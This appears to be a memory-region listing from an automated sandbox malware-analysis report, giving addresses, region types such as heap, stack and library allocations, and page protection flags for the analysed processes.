7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
201E8389000
|
heap
|
page read and write
|
||
|
6169C73000
|
stack
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FF0B000
|
heap
|
page read and write
|
||
|
2CB9FF02000
|
heap
|
page read and write
|
||
|
2CB9FED8000
|
heap
|
page read and write
|
||
|
2CB9FEFC000
|
heap
|
page read and write
|
||
|
223A2D50000
|
heap
|
page read and write
|
||
|
2603DD3A000
|
heap
|
page read and write
|
||
|
2603DC67000
|
heap
|
page read and write
|
||
|
2CB9FEDB000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
2603DC5F000
|
heap
|
page read and write
|
||
|
223A2DA1000
|
heap
|
page read and write
|
||
|
26023A90000
|
heap
|
page read and write
|
||
|
26027162000
|
trusted library allocation
|
page read and write
|
||
|
260357FC000
|
trusted library allocation
|
page read and write
|
||
|
22388EB7000
|
heap
|
page read and write
|
||
|
2238A91D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
201E8120000
|
heap
|
page read and write
|
||
|
2603DA5A000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FEFC000
|
heap
|
page read and write
|
||
|
7FFD9BA32000
|
trusted library allocation
|
page read and write
|
||
|
947D0FE000
|
unkown
|
page read and write
|
||
|
2603DC5D000
|
heap
|
page read and write
|
||
|
2CBA4E2A000
|
heap
|
page read and write
|
||
|
26025731000
|
trusted library allocation
|
page read and write
|
||
|
201EA4FF000
|
heap
|
page read and write
|
||
|
260254F0000
|
trusted library section
|
page read and write
|
||
|
26023ACD000
|
heap
|
page read and write
|
||
|
7FFD9B916000
|
trusted library allocation
|
page read and write
|
||
|
223A2E50000
|
heap
|
page read and write
|
||
|
2CB9FEFC000
|
heap
|
page read and write
|
||
|
7FFD9B94C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page execute and read and write
|
||
|
616A0BF000
|
stack
|
page read and write
|
||
|
616A2BE000
|
stack
|
page read and write
|
||
|
2468DF4B000
|
heap
|
page read and write
|
||
|
201E833D000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
201EA517000
|
heap
|
page read and write
|
||
|
6169DFE000
|
stack
|
page read and write
|
||
|
20181B77000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
20181C41000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
22388EB9000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
2468E200000
|
heap
|
page read and write
|
||
|
260265B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
DB5967E000
|
stack
|
page read and write
|
||
|
201E831F000
|
heap
|
page read and write
|
||
|
22388C60000
|
heap
|
page read and write
|
||
|
2CBA25C5000
|
heap
|
page read and write
|
||
|
DB5A7CC000
|
stack
|
page read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
201E835D000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
DB599B8000
|
stack
|
page read and write
|
||
|
2CBA4F18000
|
heap
|
page read and write
|
||
|
2238AC18000
|
trusted library allocation
|
page read and write
|
||
|
DB5A60E000
|
stack
|
page read and write
|
||
|
7FFD9B87B000
|
trusted library allocation
|
page execute and read and write
|
||
|
201EA4DF000
|
heap
|
page read and write
|
||
|
DB594FE000
|
stack
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
DB59C3B000
|
stack
|
page read and write
|
||
|
DB595FD000
|
stack
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
26023B90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
300F000
|
stack
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
2018195D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B89D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
2CBA00D5000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
2974E3E0000
|
heap
|
page read and write
|
||
|
2468DE30000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
22388F15000
|
heap
|
page read and write
|
||
|
201EA460000
|
heap
|
page read and write
|
||
|
7D17B77000
|
stack
|
page read and write
|
||
|
201901B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
223A2E30000
|
heap
|
page read and write
|
||
|
2603DC40000
|
heap
|
page read and write
|
||
|
201E84E0000
|
heap
|
page read and write
|
||
|
223A3180000
|
heap
|
page read and write
|
||
|
2238ACF8000
|
trusted library allocation
|
page read and write
|
||
|
7D17EFB000
|
stack
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
26023A70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
2238A931000
|
trusted library allocation
|
page read and write
|
||
|
B2C000
|
stack
|
page read and write
|
||
|
2603580A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B976000
|
trusted library allocation
|
page execute and read and write
|
||
|
20180082000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FEDE000
|
heap
|
page read and write
|
||
|
26025BB4000
|
trusted library allocation
|
page read and write
|
||
|
2602558E000
|
trusted library allocation
|
page read and write
|
||
|
2018194D000
|
trusted library allocation
|
page read and write
|
||
|
26025480000
|
trusted library allocation
|
page read and write
|
||
|
2468DD50000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
20190072000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B946000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
2603DCD8000
|
heap
|
page read and write
|
||
|
260271FD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B864000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
DB5A6CE000
|
stack
|
page read and write
|
||
|
2238A87B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B852000
|
trusted library allocation
|
page read and write
|
||
|
D9D8EFF000
|
stack
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
2603DCDC000
|
heap
|
page read and write
|
||
|
7D18A8C000
|
stack
|
page read and write
|
||
|
2ECF000
|
stack
|
page read and write
|
||
|
DB591F3000
|
stack
|
page read and write
|
||
|
7FFD9BA1A000
|
trusted library allocation
|
page read and write
|
||
|
2603D9C0000
|
heap
|
page execute and read and write
|
||
|
201EA25A000
|
heap
|
page read and write
|
||
|
22388E10000
|
heap
|
page readonly
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
20181474000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBD7000
|
trusted library allocation
|
page read and write
|
||
|
201EA2BF000
|
heap
|
page read and write
|
||
|
2238A92E000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FE00000
|
heap
|
page read and write
|
||
|
7FFD9B946000
|
trusted library allocation
|
page read and write
|
||
|
2CBA4283000
|
heap
|
page read and write
|
||
|
2468E205000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
201E8460000
|
heap
|
page execute and read and write
|
||
|
2603DB40000
|
heap
|
page read and write
|
||
|
22388F50000
|
heap
|
page read and write
|
||
|
7FFD9BA4A000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
201E8384000
|
heap
|
page read and write
|
||
|
D9D86FE000
|
stack
|
page read and write
|
||
|
201E834F000
|
heap
|
page read and write
|
||
|
2CBA00DA000
|
heap
|
page read and write
|
||
|
2603DD53000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
BEC2FFF000
|
stack
|
page read and write
|
||
|
2238A865000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B86D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA01000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B863000
|
trusted library allocation
|
page execute and read and write
|
||
|
616A43E000
|
stack
|
page read and write
|
||
|
26023BA0000
|
heap
|
page readonly
|
||
|
7FFD9B85D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26027222000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
7D1894D000
|
stack
|
page read and write
|
||
|
2CBA4E10000
|
heap
|
page read and write
|
||
|
26025ACB000
|
trusted library allocation
|
page read and write
|
||
|
2603DE40000
|
heap
|
page read and write
|
||
|
201E84E5000
|
heap
|
page read and write
|
||
|
DB5957E000
|
stack
|
page read and write
|
||
|
2238AC24000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
201E8307000
|
heap
|
page read and write
|
||
|
2238AE6E000
|
trusted library allocation
|
page read and write
|
||
|
2F0D000
|
stack
|
page read and write
|
||
|
201E8200000
|
heap
|
page read and write
|
||
|
D9D87FE000
|
stack
|
page read and write
|
||
|
26023C10000
|
heap
|
page execute and read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
DB5977E000
|
stack
|
page read and write
|
||
|
2238A829000
|
trusted library allocation
|
page read and write
|
||
|
223A2F56000
|
heap
|
page read and write
|
||
|
2B1E000
|
stack
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
2238AD65000
|
trusted library allocation
|
page read and write
|
||
|
6169F7E000
|
stack
|
page read and write
|
||
|
7D175EF000
|
stack
|
page read and write
|
||
|
26025A4B000
|
trusted library allocation
|
page read and write
|
||
|
2603DA3B000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB32000
|
trusted library allocation
|
page read and write
|
||
|
26023C60000
|
heap
|
page execute and read and write
|
||
|
201E82A0000
|
trusted library allocation
|
page read and write
|
||
|
22388E7B000
|
heap
|
page read and write
|
||
|
26025511000
|
trusted library allocation
|
page read and write
|
||
|
2CBA388D000
|
heap
|
page read and write
|
||
|
7FFD9BA0A000
|
trusted library allocation
|
page read and write
|
||
|
2603593B000
|
trusted library allocation
|
page read and write
|
||
|
2CBA00D0000
|
heap
|
page read and write
|
||
|
22388D60000
|
heap
|
page read and write
|
||
|
2603DA20000
|
heap
|
page read and write
|
||
|
201E82D0000
|
heap
|
page readonly
|
||
|
7D17E7B000
|
stack
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA02000
|
trusted library allocation
|
page read and write
|
||
|
260357AC000
|
trusted library allocation
|
page read and write
|
||
|
26027201000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA42000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
26023A98000
|
heap
|
page read and write
|
||
|
2238A96A000
|
trusted library allocation
|
page read and write
|
||
|
616A07E000
|
stack
|
page read and write
|
||
|
2238A920000
|
trusted library allocation
|
page read and write
|
||
|
260258D8000
|
trusted library allocation
|
page read and write
|
||
|
201EA26C000
|
heap
|
page read and write
|
||
|
20181969000
|
trusted library allocation
|
page read and write
|
||
|
7D178FD000
|
stack
|
page read and write
|
||
|
20181C3D000
|
trusted library allocation
|
page read and write
|
||
|
26026B4F000
|
trusted library allocation
|
page read and write
|
||
|
6169E7C000
|
stack
|
page read and write
|
||
|
22389060000
|
heap
|
page read and write
|
||
|
2CBA1BC5000
|
heap
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
260239D0000
|
heap
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
2603DC62000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
223A2DB0000
|
heap
|
page execute and read and write
|
||
|
7D179FE000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
22388F90000
|
heap
|
page execute and read and write
|
||
|
DB5947E000
|
stack
|
page read and write
|
||
|
201EA28A000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
223A2F95000
|
heap
|
page read and write
|
||
|
26025A8E000
|
trusted library allocation
|
page read and write
|
||
|
20181976000
|
trusted library allocation
|
page read and write
|
||
|
201E9D60000
|
heap
|
page execute and read and write
|
||
|
201EA240000
|
heap
|
page read and write
|
||
|
2603DFE0000
|
heap
|
page read and write
|
||
|
26025509000
|
heap
|
page read and write
|
||
|
201E9DE5000
|
heap
|
page read and write
|
||
|
6169FFF000
|
stack
|
page read and write
|
||
|
260258D0000
|
trusted library allocation
|
page read and write
|
||
|
26025AA4000
|
trusted library allocation
|
page read and write
|
||
|
223A2CFB000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
26025500000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
947D07C000
|
stack
|
page read and write
|
||
|
2CB9FEFC000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
201E82C0000
|
trusted library allocation
|
page read and write
|
||
|
314F000
|
stack
|
page read and write
|
||
|
2468DF4D000
|
heap
|
page read and write
|
||
|
7D18A0E000
|
stack
|
page read and write
|
||
|
2974E3C0000
|
heap
|
page read and write
|
||
|
2CB9FF0A000
|
heap
|
page read and write
|
||
|
22388E75000
|
heap
|
page read and write
|
||
|
2DCC000
|
stack
|
page read and write
|
||
|
2238A834000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FE80000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
223A2F52000
|
heap
|
page read and write
|
||
|
DB5A68D000
|
stack
|
page read and write
|
||
|
20181950000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FEAF000
|
heap
|
page read and write
|
||
|
26026B62000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
616A13E000
|
stack
|
page read and write
|
||
|
201EA30A000
|
heap
|
page read and write
|
||
|
DB59A3F000
|
stack
|
page read and write
|
||
|
22388DE0000
|
trusted library allocation
|
page read and write
|
||
|
2603DD41000
|
heap
|
page read and write
|
||
|
7FFD9B862000
|
trusted library allocation
|
page read and write
|
||
|
22388DA0000
|
heap
|
page read and write
|
||
|
22388E30000
|
heap
|
page read and write
|
||
|
7FFD9B894000
|
trusted library allocation
|
page read and write
|
||
|
201E9D90000
|
heap
|
page read and write
|
||
|
26026B5E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
26023CA5000
|
heap
|
page read and write
|
||
|
7FFD9B87D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA41000
|
trusted library allocation
|
page read and write
|
||
|
260238F0000
|
heap
|
page read and write
|
||
|
26023AD8000
|
heap
|
page read and write
|
||
|
201EA440000
|
heap
|
page read and write
|
||
|
26026EB2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B86B000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FF28000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA95000
|
trusted library allocation
|
page read and write
|
||
|
6169EFE000
|
stack
|
page read and write
|
||
|
7FFD9B9F2000
|
trusted library allocation
|
page read and write
|
||
|
2238A811000
|
trusted library allocation
|
page read and write
|
||
|
223A2CB0000
|
heap
|
page read and write
|
||
|
223A2D5A000
|
heap
|
page read and write
|
||
|
2239A811000
|
trusted library allocation
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page execute and read and write
|
||
|
223A2F6B000
|
heap
|
page read and write
|
||
|
2238904A000
|
heap
|
page read and write
|
||
|
1110000
|
heap
|
page read and write
|
||
|
2238AC0C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
2602725E000
|
trusted library allocation
|
page read and write
|
There are 578 hidden memdumps, click here to show them.